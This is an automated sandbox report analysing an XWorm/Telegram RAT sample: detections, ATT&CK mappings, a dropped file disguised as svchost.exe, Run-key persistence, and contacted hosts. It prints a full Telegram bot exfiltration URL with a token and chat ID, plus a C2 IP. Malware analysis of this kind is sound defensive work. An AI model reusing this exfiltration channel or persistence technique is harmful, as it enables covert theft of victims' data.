Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\svchost.exe VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, 00000000.00000002.2963211372.000000001B9A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2943457203.0000000000A93000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: file.exe PID: 7312, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 0.0.file.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2950679638.0000000002A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2950679638.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1674417480.00000000005C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7312, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\svchost.exe, type: DROPPED

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: file.exe PID: 7312, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 0.0.file.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2950679638.0000000002A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2950679638.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1674417480.00000000005C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7312, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\svchost.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	21 Registry Run Keys / Startup Folder	12 Process Injection	11 Masquerading	OS Credential Dumping	221 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 DLL Side-Loading	21 Registry Run Keys / Startup Folder	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	76%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT
file.exe	100%	Avira	TR/Spy.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\svchost.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Local\svchost.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\svchost.exe	76%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT

Source	Detection	Scanner	Label
http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0	0%	Avira URL Cloud	safe
87.120.112.33	0%	Avira URL Cloud	safe
http://crl.mw	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB905B3EB694EB551DA9%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20FO89G66H%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6	false		high
87.120.112.33	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0	powershell.exe, 00000001.00000002.1770104920.0000021FF1740000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1758662678.0000021F90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1860676438.000001B6CE7C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2049175145.000001D6D8F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	file.exe, 00000000.00000002.2950679638.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	file.exe, svchost.exe.0.dr	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.1741638824.0000021F80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1796456887.000001B6BE979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1923470094.000001D6C92C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.micom/pkiops/Docs/ry.htm0	powershell.exe, 00000001.00000002.1768900045.0000021FF1621000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.mic	powershell.exe, 00000001.00000002.1767227966.0000021FF13B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081626853.000001D6E1661000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2289580802.0000022735177000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.m	powershell.exe, 00000007.00000002.2081626853.000001D6E1661000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.microso	powershell.exe, 00000001.00000002.1768716785.0000021FF1532000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081626853.000001D6E16BB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.mw	powershell.exe, 00000001.00000002.1770104920.0000021FF16F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.1741638824.0000021F80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1796456887.000001B6BE979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1923470094.000001D6C92C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1758662678.0000021F90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1860676438.000001B6CE7C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2049175145.000001D6D8F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micft.cMicRosof	powershell.exe, 00000001.00000002.1767227966.0000021FF13B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081626853.000001D6E1661000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2289580802.0000022735177000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000001.00000002.1741638824.0000021F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1796456887.000001B6BE751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1923470094.000001D6C8F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2130916152.000002271C921000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	file.exe, 00000000.00000002.2950679638.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	file.exe, 00000000.00000002.2950679638.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1741638824.0000021F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1796456887.000001B6BE751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1923470094.000001D6C8F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2130916152.000002271C921000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micros	powershell.exe, 00000007.00000002.2081462859.000001D6E14B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=14704	file.exe, 00000000.00000002.2950679638.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
87.120.112.33	unknown	Bulgaria		25206	UNACS-AS-BG8000BurgasBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1560514
Start date and time:	2024-11-21 22:20:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@15/21@1/2
EGA Information:	Successful, ratio: 14.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 74 Number of non-executed functions: 9
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7412 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7640 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7880 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8136 because it is empty
Execution Graph export aborted for target svchost.exe, PID 5664 because it is empty
Execution Graph export aborted for target svchost.exe, PID 7480 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
16:21:03	API Interceptor	55x Sleep call for process: powershell.exe modified
16:22:06	API Interceptor	152x Sleep call for process: file.exe modified
21:22:05	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Local\svchost.exe
21:22:13	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Local\svchost.exe
21:22:21	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
149.154.167.220	file.exe	Get hash	malicious	Unknown	Browse
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse
	order requirements CIF-TRC809945210.exe	Get hash	malicious	GuLoader	Browse
	Updated Invoice_0755404645-2024_pdf.exe	Get hash	malicious	Unknown	Browse
	CONTRACT COPY PRN00720387_pdf.exe	Get hash	malicious	GuLoader	Browse
	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PO-841122676_g787.exe	Get hash	malicious	GuLoader	Browse
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse
	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
87.120.112.33	file.exe	Get hash	malicious	XWorm	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse
	file.exe	Get hash	malicious	XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	FW_ Signature Required For Agreement with ID_41392PJBM8759674.msg	Get hash	malicious	Unknown	Browse	199.232.210.172
	[EXTERNAL] Oakville shared ''o_akville_853473074_21.11.2024''.eml	Get hash	malicious	Unknown	Browse	199.232.210.172
	mORxR4LsiI.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	Kellyb Timesheet Report.pdf	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	estimate Cost.pdf	Get hash	malicious	Unknown	Browse	199.232.214.172
	mLi58UzdI2.dll	Get hash	malicious	Unknown	Browse	199.232.210.172
	1.e.msi	Get hash	malicious	DanaBot	Browse	199.232.214.172
	F2.exe	Get hash	malicious	BlackMoon	Browse	199.232.214.172
	test2.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	file.exe	Get hash	malicious	Credential Flusher	Browse	199.232.214.172
api.telegram.org	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	order requirements CIF-TRC809945210.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Updated Invoice_0755404645-2024_pdf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	CONTRACT COPY PRN00720387_pdf.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO-841122676_g787.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	S0FTWARE.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	order requirements CIF-TRC809945210.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	Updated Invoice_0755404645-2024_pdf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	CONTRACT COPY PRN00720387_pdf.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
UNACS-AS-BG8000BurgasBG	Listing_error_15_code_file-002.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	87.120.115.30
	G0822412237079O_Details_recal_pdf.js	Get hash	malicious	WSHRAT	Browse	87.120.115.30
	Listing_error_15_code_file-002.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	87.120.115.30
	NeftPaymentError_details__Emdtd22102024_jpg.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	87.120.115.30
	https://www.plushtoysmfg.com/plush-keychain-factory/	Get hash	malicious	Anonymous Proxy	Browse	87.120.125.158
	FACTURA9876567800.docx.doc	Get hash	malicious	Lokibot	Browse	87.120.113.235
	GT98765678000800.pif.exe	Get hash	malicious	Lokibot	Browse	87.120.113.235
	POIUYTR0987000.bat.exe	Get hash	malicious	Lokibot	Browse	87.120.113.235
	LGFH9876567800T..bat.exe	Get hash	malicious	Lokibot	Browse	87.120.113.235
	mips.elf	Get hash	malicious	Mirai	Browse	87.120.114.32

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	20mktbose2.bat	Get hash	malicious	Abobus Obfuscator	Browse	149.154.167.220
	RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	149.154.167.220
	y.bat	Get hash	malicious	Braodo	Browse	149.154.167.220
	20bosemkt.bat	Get hash	malicious	Abobus Obfuscator	Browse	149.154.167.220
	OGo8AQxn4k.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220
	3o2WdGwcLF.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://amstoree.z13.web.core.windows.net/WinhelpSh0A057/index.html?Anph%5C=1-888-734-7204	Get hash	malicious	Unknown	Browse	149.154.167.220
	New PO 796512.exe	Get hash	malicious	FormBook	Browse	149.154.167.220
	Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnk	Get hash	malicious	Ducktail	Browse	149.154.167.220
	https://spacardportal.works.com/gar	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\AppData\Local\svchost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	41
Entropy (8bit):	3.7195394315431693
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
MD5:	0DB526D48DAB0E640663E4DC0EFE82BA
SHA1:	17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
SHA-256:	934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
